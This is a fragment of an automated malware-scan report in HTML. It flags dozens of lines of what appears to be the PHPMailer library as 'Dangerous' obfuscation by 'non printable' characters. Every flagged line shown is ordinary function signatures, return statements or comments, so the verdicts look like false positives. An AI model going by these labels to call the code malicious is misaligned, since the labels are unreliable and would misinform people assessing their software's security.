<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
